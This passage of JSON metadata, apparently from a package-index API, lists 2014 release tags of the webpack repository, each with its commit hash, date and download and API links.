ed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpa